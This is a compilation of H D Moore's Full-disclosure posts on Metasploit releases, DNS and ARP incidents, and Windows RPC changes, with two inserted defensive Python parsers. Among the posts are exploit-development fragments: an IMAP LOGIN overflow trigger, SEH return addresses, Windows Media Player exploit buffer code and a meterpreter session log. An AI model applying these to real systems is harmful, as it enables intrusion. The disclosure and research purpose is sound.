 - http://metasploit.com/projects/Framework/


When I viewed the online demo of SAINT Exploit in December of 2005, nearly 
all of their exploit modules had names very similar to the ones found in 
version 2.5 of the Metasploit Framework. The demo has been updated since 
then and a handful of new exploits have been mixed in while others had 
their name changed. Oh, and their placement of a Google Adword on 
"metasploit" was a nice touch...


-HD


On Tuesday 17 January 2006 16:25, [EMAIL PROTECTED] wrote:
> All,
> I am in the process of researching a wide variety of penetration
> testing tools and vulnerability assessment tools. I've already
> researched many of the commercial tools like Coresecurity's Core Impact
> tool and even know a bit about the new tool that saint is about to come
> out with. What about open-source tools?
>
> Are there any open source tools like Core Impact that allow you to
> not only scan a network for vulnerabilities but then allow you to issue
> attacks against those vulnerabilities? I'm interested in both windows
> based and *nix based tools. Yes I am aware of nessus, exploit tree,
> metasploit etc... but none of those really have the "identify then
> attack" type of structure... they are either "identify" or "attack".
>
> -simon


Re: [Full-disclosure] Vulnerability/Penetration Testing Tools

2006-01-17 Thread H D Moore
Er, woops, misread - you want to scan and automatically exploit systems. 
This can be easily done with a little scripting and the available 
open-source tools. SensePost has a project called BiDiBLAH that 
integrates Google-discovery, a TCP port scanner, Nessus, and Metasploit:
- http://www.sensepost.com/research/bidiblah/

The next version of the Metasploit Framework (v3) has support for 'recon' 
modules that technically you could use to automate this, but it will take 
some time before this is usable.

-HD


On Tuesday 17 January 2006 18:04, H D Moore wrote:
> You should check out the Metasploit Framework:
>  - http://metasploit.com/projects/Framework/



Re: [Full-disclosure] MailEnable Imapd remote BoF + Exploit [x0n3-h4ck]

2005-04-06 Thread H D Moore
If you care at all about security, run, don't walk, away from this 
software. Another simple overflow via the "LOGIN" IMAP command:

A001 LOGIN (>1024 bytes)\r\n

-HD

On Tuesday 05 April 2005 12:31, expanders wrote:
> -=[+] Application:Mail Enable Imapd ( MEIMAP.exe )


Re: [Full-disclosure] IIS hacking contest

2005-04-07 Thread H D Moore
Marc,

I will buy you *two* Xboxes for a nice IIS 6.0 remote :-)

Seriously, the "market value" of a remote exploit for IIS 6.0 is
 somewhere between two and twenty thousand dollars, depending on how
 shady you want to get. These "find some 0day and give it to us"
 challenges are a waste of time in terms of product security, it's just
 blatant exploitation (the bad kind).

-HD

On Thursday 07 April 2005 17:35, Marc Maiffret wrote:
> The "funny" part is if the server gets DDoS'd then so will Windows IT
> Pro magazine who is hosting the hack server (now at least) on the same
> subnet as their main website and with the same routes of course...
> Maybe they can product test some Arbor networks gear while they are at
> it :-) two for one.
>
> Then again we did break our last xbox, so h
>
> Signed,
> Marc Maiffret


[Full-disclosure] Metasploit Framework v2.4

2005-05-11 Thread H D Moore
The Metasploit Framework is an advanced open-source exploit
development platform. The 2.4 release includes three user interfaces,
72 exploits and 75 payloads.

The Framework will run on any modern operating system that has a working
Perl interpreter. The Windows installer includes a slimmed-down version
of the Cygwin environment.

Some highlights in this release:

 - Previously unreleased exploits (20 others added since 2.3)
   + Solaris KCMS Arbitrary File Read
   + Solaris snmpXdmid AddComponent Overflow
   + Metasploit Framework Payload Handler
   + Microsoft Message Queueing Service MS05-017
   + Minishare 1.41 Buffer Overflow

 - Addition of the new SunRPC and XDR Perl API
   + Allows for clean RPC exploit development
   + Used by two new exploit modules (KCMS and snmpXdmid)
   + Updated sadmind exploit uses the new API

 - Includes the new win32 PassiveX payload system
   + Loads an arbitrary ActiveX through Internet Explorer
   + PassiveX payload loads the next stage over HTTP
   + HTTP transport emulates a standard TCP connection
   + Interact with cmd.exe, VNC, or Meterpreter over HTTP
   + Uses Internet Explorer settings for proxy access
   + Fully-functional on systems with Internet Explorer 6
   + Extensive documentation is available online:
     * http://www.uninformed.org/?v=1&a=3&t=pdf

 - Stability improvements and numerous bug fixes
   + The msfweb interface is slightly less of a memory pig
   + Many exploits have been updated and improved
   + New external references added to the exploit modules

 - General improvements to the payload system
   + Brand new "shelldemo" binary for the impurity stager
   + Size reductions to win32_bind, win32_reverse, and others
   + Can now make standalone executables with msfpayload
   + Interact with metasploit payloads via payload_handler.pm
  
This release is available from the Metasploit.com web site:
  - Unix:  http://metasploit.com/tools/framework-2.4.tar.gz
  - Win32: http://metasploit.com/tools/framework-2.4.exe
  
A demonstration of the msfweb interface is running live from:
  - http://metasploit.com:5/

Exploit modules designed for the 2.2 and 2.3 releases should maintain
compatibility with 2.4. If you run into any problems using older
modules with this release, please let us know.

The Opcode Database now includes Service Pack 1 for Windows 2003
Server, increasing the record count to over 10 million. We would like to
thank Catalin Patulea for helping us optimize and
improve the database -- queries are now drastically faster.

The Framework development team consists of four active members and a
handful of part-time contributors. Check out the 'Credits' exploit
module for a complete list of contributors.

You can subscribe to the Metasploit Framework mailing list by sending a
blank email to framework-subscribe[at]metasploit.com. This is the
preferred way to submit bugs, suggest new features, and discuss the
Framework with other users.

If you would like to contact us directly, please email us at:
msfdev[at]metasploit.com.

For more information about the Framework and this release in general,
please refer to the online documentation, particularly the User Guide:
  - http://metasploit.com/projects/Framework/documentation.html


Enjoy!

- The Metasploit Framework Development Team
 ( hdm, spoonm, skape, and vlad902 )


Re: [Full-disclosure] Re : CAU-EX-2008-0002: Kaminsky DNS Cache Poisoning Flaw Exploit

2008-07-25 Thread H D Moore
On Friday 25 July 2008, tixxDZ wrote:
> I do not want to offend anyone (Metasploit people), this is a simple
> joke: can you share with us all the logs of the vulnerable servers ?
> ;) , the exploit will use the Metasploit service to verify
> exploitability. ex checking my Opendns:

The exploit needs a service to determine the source port used by the 
target name server. The 'check' command will do this and could probably 
use a better warning about information disclosure. The exploit itself 
will also query the Metasploit service if you set SRCPORT to 0. While 
this means we *could* capture a list of vulnerable nameservers which 
query this service, honestly we don't care and aren't logging it. There 
are much more effective ways to scan for exploitable cache servers :-)

The source code for the helper service is also a Metasploit module and can 
be found under modules/auxiliary/server/dns/spoofhelper.rb

If you want to use your own server for this, just change 
*.red.metasploit.com to be a domain handled by your own copy of the 
spoofhelper module. In the future, we will add an option to specify the 
nameserver used for this check.

To clarify:

 - Nothing is sent to metasploit.com unless SRCPORT is manually set to '0' 
or the check command is run (non-standard for aux modules).

 - The only information we receive is the IP and source port of the tested 
nameserver. No information is sent about the user's system or their own 
IP address.

 - Even though this information could be logged and sorted and whatnot, we 
honestly don't care and just added it as a convenience feature. We don't 
keep records of the queries hitting the server and have no plans to start 
doing so.

 - If you don't like it, don't run 'check' and don't set SRCPORT to '0' 
for automatic mode. It won't hurt our feelings and you are free to modify 
the module to point at your own helper service.

Cheers,

-HD


PS. You can use the service outside of the module to check various 
servers. For example:

while true; do dig +short -t TXT `date +%s`.red.metasploit.com @4.2.2.3; 
sleep 1; done
"209.244.4.227:33165 1217014609.red.metasploit.com"
"209.244.4.227:32728 1217014610.red.metasploit.com"
"209.244.4.227:29607 1217014611.red.metasploit.com"
"209.244.4.227:28032 1217014612.red.metasploit.com"
"209.244.4.227:25992 1217014613.red.metasploit.com"
"209.244.4.227:31301 1217014614.red.metasploit.com"
"209.244.4.227:22884 1217014615.red.metasploit.com"
"209.244.4.227:33722 1217014616.red.metasploit.com"

^- changing ports means the box is patched.
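A parser for the dig loop output above, as an added example that is not from the post or from the spoofhelper module. It runs on the eight answers shown plus two constructed transcripts, and adds a "sequential" verdict for ports that change by a fixed step, which the one-line rule "changing ports means patched" would otherwise accept.

```python
import re

# The helper answers with a TXT record of the form "IP:PORT qname"; dig +short
# prints it with surrounding double quotes.
ANSWER_RE = re.compile(r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d{1,5})\s+(?P<qname>\S+)$")


def parse_answers(lines):
    """Turn dig +short TXT answers into (source_ip, source_port) tuples.

    Lines that do not match the helper's answer format (timeouts, SERVFAIL
    text, blank lines) are skipped rather than treated as samples.
    """
    samples = []
    for raw in lines:
        m = ANSWER_RE.match(raw.strip().strip('"'))
        if m:
            samples.append((m.group("ip"), int(m.group("port"))))
    return samples


def classify_source_ports(ports):
    """Rough verdict on a resolver's UDP source-port behaviour.

    'static'     : every query left from the same port (the unpatched case)
    'sequential' : ports change by a constant step, so they still can be predicted
    'varying'    : ports change with no fixed step, consistent with a patched resolver
    A handful of samples cannot prove randomness; it can only rule out the two weak patterns.
    """
    if len(ports) < 3:
        return "insufficient"
    if len(set(ports)) == 1:
        return "static"
    steps = {later - earlier for earlier, later in zip(ports, ports[1:])}
    if len(steps) == 1:
        return "sequential"
    return "varying"


def assess(lines):
    """Summarise one dig loop transcript: resolver address(es) seen, sample count, verdict."""
    answers = parse_answers(lines)
    ports = [port for _, port in answers]
    return {
        "resolvers": sorted({ip for ip, _ in answers}),
        "samples": len(ports),
        "distinct_ports": len(set(ports)),
        "verdict": classify_source_ports(ports),
    }


# The eight answers quoted in the post.
TRANSCRIPT = [
    '"209.244.4.227:33165 1217014609.red.metasploit.com"',
    '"209.244.4.227:32728 1217014610.red.metasploit.com"',
    '"209.244.4.227:29607 1217014611.red.metasploit.com"',
    '"209.244.4.227:28032 1217014612.red.metasploit.com"',
    '"209.244.4.227:25992 1217014613.red.metasploit.com"',
    '"209.244.4.227:31301 1217014614.red.metasploit.com"',
    '"209.244.4.227:22884 1217014615.red.metasploit.com"',
    '"209.244.4.227:33722 1217014616.red.metasploit.com"',
]

# Constructed transcripts (documentation address 192.0.2.53) for the two weak patterns.
STATIC_SAMPLE = ['"192.0.2.53:32768 %d.red.metasploit.com"' % t for t in range(1217014620, 1217014623)]
SEQUENTIAL_SAMPLE = ['"192.0.2.53:%d %d.red.metasploit.com"' % (1024 + i, 1217014630 + i) for i in range(3)]
```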



Re: [Full-disclosure] Metasploit 3.2 Offers More 'Evil Deeds'

2008-10-09 Thread H D Moore
You can find our SecTOR presentation online at:
  http://metasploit.com/research/conferences/

Grab an early copy of 3.2 (testing) from SVN:
  $ svn co http://metasploit.com/svn/framework3/trunk/ msf32/

A little bit about the new licensing (much more to follow):
  http://www.darkreading.com/document.asp?doc_id=165636&WT.svl=news1_1

Metasploit is now officially an open-source project with a mostly-new 
group of developers behind it. We are still a week or two away from the 
final release, so keep an eye out for more information about the new 
features and improvements on the metasploit blog:
  http://metasploit.com/blog

-HD

PS. The "Evil Deeds" article is mostly correct, but some of the specific 
items were mangled in translation. The new EXE template does not allow 
you to turn a metasploit exploit into an EXE, it lets you take a 
metasploit payload+encoder into an EXE, big difference :-)

On Thursday 09 October 2008, Ivan . wrote:
> Metasploit 3.2 looks like it rocks!




[Full-disclosure] Metasploit Framework 3.2 Released

2008-11-19 Thread H D Moore

 Contact: H D Moore  FOR IMMEDIATE RELEASE
   Email: hdm[at]metasploit.com

 
  Austin, Texas, November 19th, 2008 -- The Metasploit Project
announced today the free, world-wide availability of version 3.2 of
their exploit development and attack framework. The latest version
is provided under a true open source software license (BSD) and is 
backed by a community-based development team.

  Metasploit runs on all modern operating systems, including Linux,
Windows, Mac OS X, and most flavors of BSD. Metasploit has been used
on a wide range of hardware platforms, from massive Unix mainframes to
the iPhone. Users can access Metasploit using the tab-completing console
interface, the Gtk GUI, the command line scripting interface, or the 
AJAX-enabled web interface. The Windows version of Metasploit includes
all software dependencies and a selection of useful networking tools. 

  The latest version of the Metasploit Framework, as well as screen
shots, video demonstrations, documentation and installation
instructions for many platforms, can be found online at

 - http://metasploit.com/framework/


  This release includes a significant number of new features and
capabilities, many of which are highlighted below.

  Version 3.2 includes exploit modules for recent Microsoft flaws, such 
as MS08-041, MS08-053, MS08-059, MS08-067, MS08-068, and many more. 

  The module format has been changed in version 3.2. The new format
removes the previous naming and location restrictions and paves the way
to an improved module loading and caching backend. For users, this means
being able to copy a module into nearly any subdirectory and be able to
immediately use it without edits.

  The Byakugan WinDBG extension developed by Pusscat has been integrated
with this release, enabling exploit developers to quickly exploit new
vulnerabilities using the best Win32 debugger available today.

  The Context-Map payload encoding system developed by I)ruid is now
enabled in this release, allowing for any chunk of known process memory to
be used as an encoding key for Windows payloads.

  The Incognito token manipulation toolkit, written by Luke Jennings, has
been integrated as a Meterpreter module. This allows an attacker to gain
new privileges through token hopping. The most common use is to hijack
domain admin credentials once remote system access is obtained.

  The PcapRub, Scruby, and Packetfu libraries have all been linked into
the Metasploit source tree, allowing easy packet injection and capture.

  The METASM pure-Ruby assembler, written by Yoann Guillot and Julien 
Tinnes, has gone through a series of updates. The latest version has been
integrated with Metasploit and now supports MIPS assembly and the ability
to compile C code.

  The Windows payload stagers have been updated to support targets with
NX CPU support. These stagers now allocate a read/write/exec segment of
memory for all payload downloads and execution. 

  Executables which have been generated by msfpayload or msfencode now 
support NX CPUs. The generated executable is now smaller and more 
reliable, opening the door to a wider range of uses. The psexec and
smb_relay modules now use an executable template that acts like a real
Windows service, improving the reliability and cleanup requirements of
these modules.

  The Reflective DLL Injection technique pioneered by Stephen Fewer of
Harmony Security has been integrated into the framework. The new payloads
use the "reflectivedllinjection" stager prefix and share the same binaries
as the older DLL injection method.

  Client-side browser exploits now benefit from a set of new javascript
obfuscation techniques developed by Egypt. This improvement leads to a
greater degree of anti-virus bypass for client-side exploits.

  Metasploit contains dozens of exploit modules for web browsers and 
third-party plugins. The new browser_autopwn module ties many of these 
together with advanced fingerprinting techniques to deliver more shells
than most pen-testers know what to do with.

  This release includes a set of man-in-the-middle, authentication relay,
and authentication capture modules. These modules can be integrated

[Full-disclosure] Analysis of MS08-006 / Demo of MS08-007

2008-02-14 Thread H D Moore
Available online at:
 https://strikecenter.bpointsys.com/

-HD



[Full-disclosure] When standards attack...

2008-03-20 Thread H D Moore
The WebKit folks just added client-side SQL database support:
 
http://webkit.org/blog/126/webkit-does-html5-client-side-database-storage/
http://glazkov.com/blog/html5-gears-wrapper/

In addition to all of the existing attacks through a web browser, we can 
now take into account SQLite vulnerabilities and client-side SQL 
injection issues as well.

From the security section of the specification:
http://www.whatwg.org/specs/web-apps/current-work/multipage/section-sql.html#sql

"""
[ 4.11.8.1. User agents ]

User agent implementors are strongly encouraged to audit all their 
supported SQL statements for security implications. For example, LOAD 
DATA INFILE is likely to pose security risks and there is little reason 
to support it.

In general, it is recommended that user agents not support features that 
control how databases are stored on disk. For example, there is little 
reason to allow Web authors to control the character encoding used in the 
disk representation of the data, as all data in ECMAScript is implicitly 
UTF-16.

[ 4.11.8.2. SQL injection ]
Authors are strongly recommended to make use of the ? placeholder feature 
of the executeSql() method, and to never construct SQL statements on the 
fly. 
"""

...because letting developers choose to bind their query parameters has 
worked so well before ;-)

-HD



[Full-disclosure] Debian OpenSSL Fun

2008-05-14 Thread H D Moore
http://metasploit.com/users/hdm/tools/debian-openssl/



Re: [Full-disclosure] Metasploit - Hack ?

2008-06-02 Thread H D Moore
Problem solved. Someone is ARP poisoning the IP address of the router on which 
the www.metasploit.com server resides. I hardcoded an ARP entry for the real 
router and that seems to solve the MITM issue. It doesn't help the other 250 
servers on that network, but that's an issue for the ISP to resolve. I included 
a traffic sample of the ARP poisoning below, if anyone is interested:




> On Monday 02 June 2008, Jacques Erasmus wrote:
> > Seems like the metasploit site has been hacked.
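A detector for the ARP-reply pattern described above, as an added example that is not part of the post. The capture lines it runs on are constructed with documentation addresses (192.0.2.0/24, MACs 00:00:5e:00:53:xx) and are wrapped after the trailing comma the way the list archive wrapped the post's own tcpdump output.

```python
import re
from collections import defaultdict

# One "tcpdump -e" line for an ARP reply, after any line wrapping is undone.
ARP_REPLY_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) (?P<eth_src>[0-9a-f:]{17}) > (?P<eth_dst>[0-9a-f:]{17}), "
    r"ethertype ARP \(0x0806\), length \d+: arp reply "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at (?P<mac>[0-9a-f:]{17})$"
)


def join_wrapped(lines):
    """Rejoin records that a mail client wrapped after the trailing comma."""
    joined = []
    for line in lines:
        line = line.rstrip()
        if joined and joined[-1].endswith(","):
            joined[-1] += " " + line.strip()
        else:
            joined.append(line)
    return joined


def parse_replies(lines):
    """Return one dict per ARP reply; requests and non-ARP lines are dropped."""
    replies = []
    for line in join_wrapped(lines):
        m = ARP_REPLY_RE.match(line.strip())
        if m:
            replies.append(m.groupdict())
    return replies


def conflicting_claims(replies):
    """Map IP -> sorted MACs for every IP advertised by more than one hardware address.

    A gateway address answered for by two different MACs within seconds is
    the poisoning signature the post describes.
    """
    claims = defaultdict(set)
    for reply in replies:
        claims[reply["ip"]].add(reply["mac"])
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}


def sender_mismatches(replies):
    """Replies whose Ethernet source differs from the advertised 'is-at' address.

    Hosts normally answer for their own MAC, so a frame from one NIC that
    advertises another NIC's address deserves a second look (proxy ARP and
    first-hop redundancy protocols can produce legitimate exceptions).
    """
    return [
        (r["ts"], r["eth_src"], r["ip"], r["mac"])
        for r in replies
        if r["eth_src"] != r["mac"]
    ]


# Constructed capture: 192.0.2.1 is the gateway, ...:01 its real MAC, ...:aa a
# second station that answers for the gateway address, ...:02 the observer.
SAMPLE_CAPTURE = [
    "13:04:38.967562 00:00:5e:00:53:01 > 00:00:5e:00:53:02, ethertype ARP (0x0806), ",
    "length 60: arp reply 192.0.2.1 is-at 00:00:5e:00:53:01",
    "13:04:39.768055 00:00:5e:00:53:aa > 00:00:5e:00:53:02, ethertype ARP (0x0806), ",
    "length 60: arp reply 192.0.2.1 is-at 00:00:5e:00:53:aa",
    "13:04:40.397616 00:00:5e:00:53:aa > 00:00:5e:00:53:02, ethertype ARP (0x0806), ",
    "length 60: arp reply 192.0.2.1 is-at 00:00:5e:00:53:01",
    "13:04:41.000000 00:00:5e:00:53:02 > 00:00:5e:00:53:01, ethertype ARP (0x0806), ",
    "length 42: arp who-has 192.0.2.1 tell 192.0.2.20",
]
```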




Re: [Full-disclosure] Metasploit - Hack ?

2008-06-02 Thread H D Moore
Looks like someone is doing ARP poisoning at the ISP level. The actual 
metasploit.com server(s) are untouched, but someone is still managing to 
MITM a large portion of the incoming traffic. To make things even more 
fun, it's coinciding with a DoS attack (syn floods) on most of the open 
services.

If you are worried about the Metasploit Framework source code being 
MITM'd during SVN checkouts, use the SSL version of the SVN tree:

$ svn co https://metasploit.com/svn/framework3/trunk/

-HD


On Monday 02 June 2008, Jacques Erasmus wrote:
> Seems like the metasploit site has been hacked.



[Full-disclosure] Windows XP SP3 - DCERPC Changes

2007-12-19 Thread H D Moore
Changes between DCERPC services on XP SP2 and XP SP3 (release candidate).
This is from a quick and dirty unmidl.py + diff(3) session [1].
Results do not include new services bundled with SP3. Results are likely
incomplete; verify this with mIDA.

Happy holidays, and thanks Dave for UNMIDL.

Cheers,

-HD

--

dhcpcsvc.dll - DHCP Client RPC Service
[ uuid(3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5), version(1.0) ]

New operations added:

long  Function_0c( 
[in] [unique]  [string] wchar_t * element_67,
[in]  long  element_68,
[in]  [string] wchar_t *  element_69,
[in] [unique]  TYPE_1 ** element_70,
[in] [unique]  TYPE_6 ** element_71,
[out]  long * element_80
 );

long  Function_0d( 
[in] [unique]  [string] wchar_t * element_82,
[in]  [string] wchar_t *  element_83,
[in] [unique]  TYPE_1 ** element_84,
[in,out]  TYPE_6 * element_85
 );

long  Function_0e( 
[in] [unique]  [string] wchar_t * element_87,
[in]  long  element_88,
[out] [ref] [unique]  [string] wchar_t ** element_89
 );

long  Function_0f( 
[in] [unique]  [string] wchar_t * element_91,
[in]  long  element_92,
[in]  [string] wchar_t *  element_93
 );

long  Function_10( 
[in] [unique]  [string] wchar_t * element_95,
[in]  [string] wchar_t *  element_96,
[out]  TYPE_8 * element_97
 );

long  Function_11( 
[in] [unique]  [string] wchar_t * element_107,
[size_is(*element_110)] [out] [ref] [unique]  long ** 
element_109,
[out]  long * element_110
 );


lsasrv.dll - LSARPC
[ uuid(12345778-1234-abcd-ef00-0123456789ab), version(0.0) ]

New operations added:

long  Function_4f( 
[in]  long  element_1115,
[in] [unique]  [string] wchar_t * element_1116,
[out] [context_handle]  void * element_1117
 );

long  Function_50( 
[in]  long  element_1119,
[in,out] [context_handle]  void * element_1120
 );

long  Function_51( 
[in]  long  element_1122,
[in] [context_handle]  void * element_1123,
[in]  long  element_1124,
[in]  TYPE_78 * element_1125,
[in]  TYPE_70 * element_1126
 );


msdtcprx.dll - MS Distributed Transaction Controller RPC Service
[ uuid(906b0ce0-c70b-1067-b317-00dd010662da), version(1.0) ]

Completely removed from XP SP3


p2psvc.dll - Peer Networking Identity Manager
[ uuid(a2d47257-12f7-4beb-8981-0ebfa935c407), version(1.0) ]

Changes to structure definitions used by operations 5, 6, 7, and 8
Changes to the function definitions for operations 5 and 7


scesrv.dll - Security Configuration Editor Engine
[ uuid(93149ca2-973b-11d1-8c39-00c04fb984f9), version(0.0) ]

Completely removed from XP SP3


seclogon.dll - Secondary Logon service
[ uuid(12b81e99-f207-4a4c-85d3-77b42f76fd14), version(1.0) ]

Completely removed from XP SP3


termsrv.dll - Terminal Server
[ uuid(5ca4a760-ebb1-11cf-8611-00a0245420ed), version(1.0) ]

A range check was added to the last argument of operation 0x24

char Function_24(
[in] [context_handle]  void * element_228,
[out]  long * element_229,
[size_is(element_232)] [out]  char  element_230,
[in]  [range(0,32768)] long  element_232
 );
 
In XP SP2, this operation is defined as:
 
char  Function_24( 
[in] [context_handle]  void * element_228,
[out]  long * element_229,
[size_is(element_231)] [out]  char  element_230,
[in]  long  element_231
 ); 
 
Since this is a size_is() field, we can assume this is an overflow check.

This operation is known as RpcWinStationEnumerateProcesses().

Since it requires a context handle, it's likely post-authentication.


wzcsvc - Wireless Configuration
[ uuid(621dff68-3c39-4c6c-aae3-e68e2c6503ad), version(1.0) ]

New operation added:

long  Function_15(
[in] [context_handle]  void * element_207,
[in]  TYPE_13 * element_208,
[in,out] [ref] [unique]  TYPE_13 *** element_209
 ); 


1.Used 'cabextract' to extract files from the SP2 and SP3 installers. Ran 
unmidl.py on each file from SP2, normalized element and type names, then 
compared it with the output from each file in SP3. The SP2 file set was 
probably missing some files, so there will be gaps in this data. 


[Full-disclosure] Windows XP SP2 - SP3 Compatible Return Addresses

2007-12-19 Thread H D Moore

Use 0x71aa15cf for pop/pop/ret on WinXP SP2/SP3 English


Download the mini-database here:
http://metasploit.com/users/hdm/tools/opcodes_xp_sp2_sp3.tar.gz

From the README:

This package contains a text listing of addresses which can be useful for
exploitation. Each subdirectory represents a type of return address and
each file within the subdirectory refers to a specific DLL.

These addresses should be valid on any Windows XP SP2 or Windows XP SP3
(release candidate) system using the English language.


To locate a return address, first determine which type of opcode you need.
If you are exploiting a SEH overwrite, then the "poppopret" files may be
the easiest route to reliable code execution. Once you know the type of
opcode you want, determine what DLLs are used by the target program. At
this point, you can just view the appropriate text file to obtain a list
of usable addresses. Examples below.


Exploiting a SEH overwrite in a program which uses Winsock2:

$ cat poppopret/ws2help.dll.txt
0x71aa1560 pop esi; pop ebp; retn 0x0008
0x71aa15cf pop edi; pop ebp; retn 0x0008

Using a "call eax" equivalent opcode in a program which uses OLE

$ cat eax/oleaut32.dll.txt
0x771613f2 call eax

-HD



[Full-disclosure] Metasploit Framework v3.1 Released

2008-01-27 Thread H D Moore
METASPLOIT UNLEASHES VERSION 3.1 OF THE METASPLOIT FRAMEWORK
   New Version of Attack Framework Ready to Pwn

  Austin, Texas, January 28th, 2008 -- The Metasploit Project
announced today the free, world-wide availability of version 3.1 of
their exploit development and attack framework. The latest version
features a graphical user interface, full support for the Windows
platform, and over 450 modules, including 265 remote exploits. 

  "Metasploit 3.1 consolidates a year of research and development,
integrating ideas and code from some of the sharpest and most innovative
folks in the security research community" said H D Moore, project
manager. Moore is referring to the numerous research projects that have
lent code to the framework.

  These projects include the METASM pure-ruby assembler developed by
Yoann Guillot and Julien Tinnes, the "Hacking the iPhone" effort
outlined in the Metasploit Blog, the Windows kernel-land payload
staging system developed by Matt Miller, the heapLib browser
exploitation library written by Alexander Sotirov, the Lorcon 802.11
raw transmit library created by Joshua Wright and Mike Kershaw, Scruby,
the Ruby port of Philippe Biondi's Scapy project, developed by Sylvain
Sarmejeanne, and a contextual encoding system for Metasploit payloads.
"Contextual encoding breaks most forms of shellcode analysis by
encoding a payload with a target-specific key" said I)ruid, author of
the Uninformed Journal (volume 9) article and developer of the
contextual encoding system included with Metasploit 3.1.  

  The graphical user interface is a major step forward for Metasploit
users on the Windows platform. Development of this interface was driven
by Fabrice Mourron and provides a wizard-based exploitation system, a
graphical file and process browser for the Meterpreter payloads, and a
multi-tab console interface. "The Metasploit GUI puts Windows users on
the same footing as those running Unix by giving them access to a 
console interface to the framework" said H D Moore, who worked with
Fabrice on the GUI project. 

  The latest incarnation of the framework includes a bristling
arsenal of exploit modules that are sure to put a smile on the face of
every information warrior. Notable exploits in the 3.1 release include
a remote, unpatched kernel-land exploit for Novell Netware, written by
toto, a series of 802.11 fuzzing modules that can spray the local
airspace with malformed frames, taking out a wide swath of
wireless-enabled devices, and a battery of exploits targeted at
Borland's InterBase product line. "I found so many holes that I just
gave up releasing all of them", said Ramon de Carvalho, founder of RISE
Security, and Metasploit contributor. 

  "Metasploit continues to be an indispensable and reliable penetration
testing framework for our modern era", says C. Wilson, a security
engineer who uses Metasploit in his daily work. Metasploit is used by
network security professionals to perform penetration tests, system
administrators to verify patch installations, product vendors to
perform regression testing, and security researchers world-wide. The
framework is written in the Ruby programming language and includes
components written in C and assembler.

  Metasploit runs on all modern operating systems, including Linux,
Windows, Mac OS X, and most flavors of BSD. Metasploit has been used
on a wide range of hardware platforms, from massive Unix mainframes to
the tiny Nokia n800 handheld. Users can access Metasploit using the
tab-completing console interface, the Gtk GUI, the command line scripting 
interface, or the AJAX-enabled web interface. The Windows version of
Metasploit includes all software dependencies and a selection of useful
networking tools. 

  The latest version of the Metasploit Framework, as well as screen
shots, video demonstrations, documentation and installation
instructions for many platforms, can be found online at

http://metasploit3.com/

  # # #
   
If you'd like more information about this topic, or to schedule an
interview with the developers, please email msfdev[at]metasploit.com



Re: [Full-disclosure] All you WMF haxxors are belong to...... Mr Moore

2006-01-23 Thread H D Moore
Nice DoS bug, next time try emailing us first :-)

-HD

On Monday 23 January 2006 04:23, cranium pain wrote:
> WMF Exploit vulnerable?
>
> [*] Starting Reverse Handler.
> [*] Waiting for connections to http://0.0.0.0:80/
> [*] Got connection from 0.0.0.0:443 <-> 1.1.1.1:42121
> [*] Sending Stage (2834 bytes)
> [*] Sleeping before sending dll.
> [*] Uploading dll to memory (69643), Please wait...
> [*] Upload completed
> meterpreter> Out of memory during "large" request for 2147487744 bytes,
> total sbrk() is 17950720 bytes at
> /home/framework/lib/Pex/Meterpreter/Packet.pm line 509
>
>
> 509:  $res = -1 if ($res >= 0 and not defined(recv($fd, $tempBuffer,
> $tempBufferLength, 0)));
>
> --
>
> "haxxoring haxxors for fun and fun"


Re: [Full-disclosure] All you WMF haxxors are belong to...... Mr Moore

2006-01-23 Thread H D Moore
There are a handful of cases where a malicious server / mitm could cause 
the Framework to run out of memory. We aren't that concerned with it -- 
if you can find a way to do something useful (run code, etc), let us 
know. We might look at limiting this in version 3.0, but no matter what 
'max size' we place on a protocol response, it's never going to be small 
enough to account for the low-end system or big enough to handle truly 
gigantic (legit) replies. The SMB, DCERPC, and BackupExec protocols also 
suffer from 'arbitrary malloc and die' issues. 

-HD


On Monday 23 January 2006 08:40, H D Moore wrote:
> Nice DoS bug, next time try emailing us first :-)
>
> -HD
>
> On Monday 23 January 2006 04:23, cranium pain wrote:
> > WMF Exploit vulnerable?
> >
> > [*] Starting Reverse Handler.
> > [*] Waiting for connections to http://0.0.0.0:80/
> > [*] Got connection from 0.0.0.0:443 <-> 1.1.1.1:42121
> > [*] Sending Stage (2834 bytes)
> > [*] Sleeping before sending dll.
> > [*] Uploading dll to memory (69643), Please wait...
> > [*] Upload completed
> > meterpreter> Out of memory during "large" request for 2147487744
> > bytes, total sbrk() is 17950720 bytes at
> > /home/framework/lib/Pex/Meterpreter/Packet.pm line 509
> >
> >
> > 509:  $res = -1 if ($res >= 0 and not defined(recv($fd, $tempBuffer,
> > $tempBufferLength, 0)));
> >
> > --
> >
> > "haxxoring haxxors for fun and fun"
>


Re: [Full-disclosure] MS06-06 Windows Media Player Exploitation

2006-02-16 Thread H D Moore
Still getting some annoying crashes (SEH trick in alphanum code is 
annoying when you are trying to debug something...), but the basic 
solution is:

1) Use alphanumeric shellcode
2) Use a return address that does not have bytes over 0x7F
3) Use a pop/pop/ret and hop over return w/o restricted bytes

my $pattern   = Pex::Text::PatternCreate(16384);
substr($pattern, 2086, 4, pack('V', 0x60082336)); # pop ebx, pop ebp, ret
substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
substr($pattern, 2090, length($shellcode), $shellcode);
$content   = "";

Return address is from js3250.dll in Firefox 1.5.0.1, you should 
auto-target based on the browser version.

-HD

On Thursday 16 February 2006 16:26, c0ntex wrote:
> No exploit, just some basic research - anyone with 100% Ascii win32
> shellcode?
>
> http://open-security.org/winmedia/index.html
>
> --
>
> regards
> c0ntex


Re: [Full-disclosure] MS06-06 Windows Media Player Exploitation

2006-02-16 Thread H D Moore
Got it working finally :-) The alpha shellcode stuff is actually 
Skylined's (ported to perl), the non-alpha prefix is only used if you 
don't pass GETPCTYPE=win32 for PexAlphaNum or GETPCTYPE=seh for Alpha2. I 
am using an address in wmp.dll (v9) and tested it successfully on Firefox 
and Opera. Time to start porting to v10 and have it auto-detect the WMP 
version. Keep your SRC path less than 4K or you end up smashing the PEB's  
module list pointers (at least with Firefox)...

-HD


my $addr = 0x07694b1e; # wmp.dll v9.00.00.2980
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $pattern   = Pex::Text::AlphaNumText(4096);

substr($pattern, 2082, 4,   "ABC=");   # inc, inc, inc, cmp eax, [ptr]  
substr($pattern, 2086, 4, pack('V', $addr));
